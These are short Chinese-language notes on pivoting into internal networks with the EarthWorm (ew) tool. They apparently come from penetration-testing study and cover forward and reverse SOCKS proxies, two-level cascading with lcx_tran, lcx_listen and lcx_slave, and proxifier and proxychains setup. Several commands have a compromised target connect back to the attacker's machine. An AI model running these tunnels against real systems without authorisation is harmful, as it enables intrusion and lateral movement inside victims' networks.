正向代理
1.選擇合適的ew文件(將文件ew_…改爲ew.exe,爲了在命令行少敲幾個字母),上傳到邊緣服務器
2.邊緣服務器輸入
ew.exe -s ssocksd -l 8000
3.可藉助proxifier工具配置攻擊機整臺機器的代理(proxifier添加代理服務器,ip爲邊緣服務器ip,8000端口)
4.之後直接訪問目標服務器任意端口即可
攻擊機爲Linux
1.選擇合適的ew文件,上傳到邊緣服務器
2.邊緣服務器輸入
ew.exe -s ssocksd -l 8000
3此時攻擊機3389仍然不能訪問,可藉助proxychains(kali自帶)配置攻擊機整臺機器的代理
3.1 輸入vim /etc/proxychains.conf,按裏面的說明進行設置
3.2.輸入以下命令即可通過代理訪問
proxychains 命令(rdesktop 192.168.0.102)
反向代理
1.攻擊機運行以下命令,將8888端口轉發到1080端口
ew -s rcsocks -l 1080 -e 8888
2.在目標服務器上啓動SOCKS v5服務,並反彈到攻擊機的8888端口
ew.exe -s rssocks -d 攻擊機ip -e 8888
3.攻擊機藉助proxifier工具配置攻擊機整臺機器的代理(proxifier添加代理服務器,ip爲攻擊機ip,1080端口)
4.之後直接訪問目標服務器任意端口即可
二級級聯
情況①:內網B與公網A互通
+------不---通-----+
| |
A<------->B------->C<----->內 網
| |
+----不----通-------+
C【在本地建立socks5代理,端口爲1234】:ew -s ssocksd -l 1234
B【把來自外部的1080端口的流量轉到內網C這臺機器的1234端口上】:ew -s lcx_tran -l 1080 -f Cip -g 1234
實質訪問B的1090端口就相當於訪問C的1080端口。
情況②:內網B可訪問外網,但沒外網IP
+------不---通-----+
| |
A<--------B------->C<----->內 網
| |
+----不----通-------+
A【把來自外部的1234端口的流量轉到本地的1080端口上】:ew -s lcx_listen -l 1080 -e 1234
C【在本地啓動socks5代理並監聽2345端口】:ew -s ssocksd -l 2345
B【把A的1234端口和C的2345端口進行綁定,即建立socks5通道】:ew -s lcx_slave -d Aip -e 1234 -f Cip -g 2345
實質訪問A的1080端口就相當於訪問C的2345端口。